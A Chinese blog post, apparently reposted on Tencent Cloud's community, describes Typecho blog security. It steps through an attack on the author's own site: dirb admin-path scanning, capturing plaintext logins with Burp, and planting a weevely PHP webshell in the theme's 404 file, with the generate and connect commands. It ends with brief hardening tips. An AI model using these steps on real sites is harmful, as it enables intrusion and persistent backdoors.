首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >浅谈Typecho安全与防范

浅谈Typecho安全与防范

作者头像
逍遥子大表哥
发布2025-07-28 20:50:40
发布2025-07-28 20:50:40
8900
代码可运行
举报
文章被收录于专栏:kali blogkali blog
运行总次数:0
代码可运行

Typecho是一款轻量级的博客程序,和著名的博客程序WP有很多相似之处。本文简单谈谈Typecho安全相关问题。

注意!文本所有测试均为模拟环境,旨在提出安全相关问题,帮助站长防患于未然。坚决反对一切危害网络安全的行为。

前不久,提到过Typecho相关XXS漏洞。现在均已修复,本文不再长谈。下面简单谈谈常见的思路吧!

后台扫描

可以利用常见的目录扫描工具,对站点的敏感目录进行扫描。

代码语言:javascript
代码运行次数:0
运行
复制
dirb https://blog.bbskali.cn

通过扫描,我们便得到了站点的后台。

密码恢复

Typecho目前后台登录,安全防范比较低,没有验证码,密码传输没有加密。

我自己的站,就不打码了😥
我自己的站,就不打码了😥

我自己的站,就不打码了😥

既然没有加密,直接可以用Burp直接恢复。

提权

当用户登录后,接下来便是提权了。Typecho和WP一样,支持在线编辑主题文件。这里,我们以404文件为例。

随便输入一个错误的URL

能够复现php探针就好玩了。我们用weevely创建一个Shell

代码语言:javascript
代码运行次数:0
运行
复制
# bbskali为连接密码
weevely generate bbskali 4.php

查看生成的代码

代码语言:javascript
代码运行次数:0
运行
复制
cat 4.php
看到乱码,不要慌,复制代码到404文件👇
看到乱码,不要慌,复制代码到404文件👇

看到乱码,不要慌,复制代码到404文件👇

连接:

代码语言:javascript
代码运行次数:0
运行
复制
weevely http://blog.bbskali.cn/404.php bbskali

安全建议

  • 修改网站后台地址
  • 加强用户名和密码
  • 使用第三方验证码插件
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-05-31,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 kali笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 后台扫描
  • 密码恢复
  • 提权
  • 安全建议
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档